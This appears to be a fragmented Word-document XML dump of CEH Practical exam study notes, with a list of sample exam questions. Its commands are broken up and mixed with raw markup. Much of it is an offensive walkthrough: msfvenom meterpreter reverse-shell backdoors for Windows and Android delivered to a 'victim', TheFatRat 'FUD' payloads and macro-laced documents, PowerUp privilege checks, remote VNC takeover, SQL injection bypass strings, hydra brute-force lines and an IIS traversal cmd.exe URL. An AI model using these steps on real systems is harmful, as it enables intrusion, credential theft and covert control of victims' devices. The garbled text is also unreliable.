rat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msfvenom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windows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meterpreter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reverse_tcp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platform windows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x86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exe LHOST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LPORT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exe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payload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platform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architecture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format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payload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output dir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now with try to share the file with the victim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we try three forms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#1 - option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/www/html/share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chmod -R 755 /var/www/html/share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chown -R www-data:www-data /var/www/html/share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// copy the text.exe to the new server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cp /root/Desktop/test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exe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/www/html/share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// #2 - option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python -m SimpleHttpServer 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// #3 - option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python3 http.server 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// start the serverwith apache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service apache2 start //apache version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//now we open msfconsole to gain a inverse shell with meterpreter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use exploit/multi/handler //similar to nc -nlvp .port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set payload windows/meterpreter/reverse_tcp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set LHOST my.ip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set LPORT my.port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bb6688"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/run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run the exploit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//share the file with the victim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//inside the victim's machine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run the exe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text.exe share with the server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//look at the metasploit session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sysinfo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system info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//now with try to enumerate to know misconfigurations on the w10 system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//using PowerSploit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upload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PowerUp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ps1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powerup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ps1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with meterpreter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shell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with shell with change from meterpreter to windows shell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now we execute powerup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powershell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ExecutionPolicy Bypass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". .\PowerUp.ps1;Invoke-AllChecks"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now we know that windows is vulnerable to dll injection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change to meterpreter shell with exit &amp; run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run vnc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will open a VNC remote control on the victim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Now we will try another method to gain access to a machine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with TheFatRat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fatrat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setup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chmd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powerfull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//run fatrat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create fud.. [Excelent]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create apache + ps1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//put the lhost and lport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enter the name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files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payload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for choosing meterpreter/reverse_tcp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payload generated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back to the menu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create a back office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macro windows and select lhost and lport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enter the name for the doc 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use custom exe backdoor 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reverse_tcp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backdoor inside the doc generate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share document with the server option 1 and 2 above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start msfconsole to gain meterpreter shell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 exploit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handler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payload windows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meterpreter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reverse_tcp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LHOST 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RHOST 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port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exploit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run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.ry3t63bs5qnk" w:id="18"/>
    <w:bookmarkEnd w:id="18"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000331">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile Hacking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create a backdoor with msfvenom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msfvenom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android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meterpreter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reverse_tcp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platform android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dalvik LHOST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backdoor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apk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share with some of the three methods above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now with metasploit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 exploit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handler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payload android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meterpreter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reverse_tcp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LHOST my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exploit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exploit with a background job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install the apk in android &amp; the session will open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sessions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will display the meterpreter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sysinfo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to know the os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Using PhoneSploit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run phonesploit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new phone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enter the ip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ip' phone &amp;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option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to shell on the phone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//in the menu you can search, download, info</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="kix.akx5i2a1gc8e" w:id="19"/>
    <w:bookmarkEnd w:id="19"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000333">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gchqnx9w2r9" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="480"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netdiscover -i eth0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52"/>
        </w:numPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="480"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map -p- 10.10.10.10 [ Any IP ]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> port discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="480"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nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10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52"/>
        </w:numPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="480"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gobuster -e -u** http://10.10.10.10 -w wordlsit.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a webserver running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000338">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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trying sqli payloads on the forms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admin' --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admin' #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admin'/*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 or 1=1--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 or 1=1#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 or 1=1/*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') or '1'='1--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') or ('1'='1—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87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bruteforcing web servers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-l root -P passwords.txt [-t 32] &lt;IP&gt; **_ftp_**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-L usernames.txt -P pass.txt &lt;IP&gt; **_mysql_**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-l USERNAME -P /path/to/passwords.txt -f &lt;IP&gt; **_pop3_** -V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-V -f -L &lt;userslist&gt; -P &lt;passwlist&gt; **_rdp_**://&lt;IP&gt;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-P common-snmp-community-strings.txt target.com **_snmp_**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-l Administrator -P words.txt 192.168.1.12 **_smb_** -t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hydra -l root -P passwords.txt &lt;IP&gt; **_ssh_**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50"/>
        </w:numPr>
        <w:spacing w:after="36" w:before="36" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="480"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cewl example.com -m 5 -w words.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> custom wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50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search for vulns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searchsploit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'Linux Kernel'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searchsploit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7618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Paste the exploit in the current directory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searchsploit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7618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Show complete path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searchsploit — nmap file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9029"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22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// Search vulns inside a Nmap XML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SAMPLE QUESTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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1)Find the IP address of the machine which is running the RDP? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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2) Find the IP address of the machine which is running the RDP? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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3) Find the HTTP method that poses a high risk to the application example.com? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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4) Find the Phone number of the employee? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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5) Find the file name which is tempered by comparing the hashes which is given in the /hashes folder? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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6) Decrypt the volume file using Vera crypt? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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7) Connect to the Server remotely using the credentials given by RDP? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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8) Decode the file which is encoded in DES (ECB) format? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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9) Find the password of the WordPress user “Demo”? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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10) Find the attacker IP address who has launched the DOS attack? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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11) Find the number of machines that were used to initiate the DDOS attack? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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12) Find the username/password from the pcap file, which is in plain text? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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13) Extract the information from the SDcard of the Android User? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035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14) Find the OS name of the machine which is running MySQL database? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035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15) Find   hidden information in the file that having all the details encrypted file (stego)= snow.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000035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16) Check the existing (abc.pcapng) file that store in your machine, find the  credentials found in the capture file and save in blank box in exams </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000353">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/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17)  Examine a packet capture file (ddos.pcapng) located in windows/Linux machine (path will be given in exam) enter the ip found from capture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the IP of the Windows machine?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000355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the version of the Linux Kernel?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000356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How many Windows machines are there?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000357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the password for user of the FTP server?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000358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the password hidden in the .jpeg file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000359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after="0" w:line="281.484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7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5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7">
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="480"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="480"/>
      </w:pPr>
      <w:rPr/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irangadh/ceh-practical/tree/main" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openstego.com/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Samsar4/Ethical-Hacking-Labs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.kali.org/password-attacks/hashcat" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.252.155/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+copy+c:%5Cinetpub%5Cscripts%5Cvirus.gif+c:%5Cinetpub%5Cwwwroot%5C" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/weixin_44912169/article/details/105655195" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c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z.aliyun.com/t/4008" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/wpjamer/p/9913380.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Adityaraj6/CEH-CheatSheet/blob/main/CMD%20CheatSheet" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/network/190128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arkLycn1976/CEH-Practical-Notes-and-Tools" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.moviescope.com/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.thegurusec.com/certifications/certified-ethical-hacker-practical/steganograp" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/register" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zhuanlan.zhihu.com/p/124246499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